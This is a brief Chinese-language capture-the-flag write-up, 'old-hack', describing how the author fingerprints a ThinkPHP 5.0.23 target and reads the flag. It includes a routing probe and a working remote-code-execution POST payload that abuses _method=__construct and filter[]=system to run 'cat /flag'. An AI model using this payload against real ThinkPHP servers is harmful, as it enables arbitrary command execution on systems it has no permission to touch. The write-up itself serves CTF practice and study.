# old-hack

看到THINKPHP5，习惯性尝试一下tp5.0的payload，结果就成了，开了强制路由还有debug模式

```
?s=/index/think\app/index
```

看到报错提示，提示是5.0.23版本，就去找一下payload

[ThinkPHP5.0.\*版本代码执行漏洞](https://blog.csdn.net/xuandao_ahfengren/article/details/86333189)

```
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /flag
```
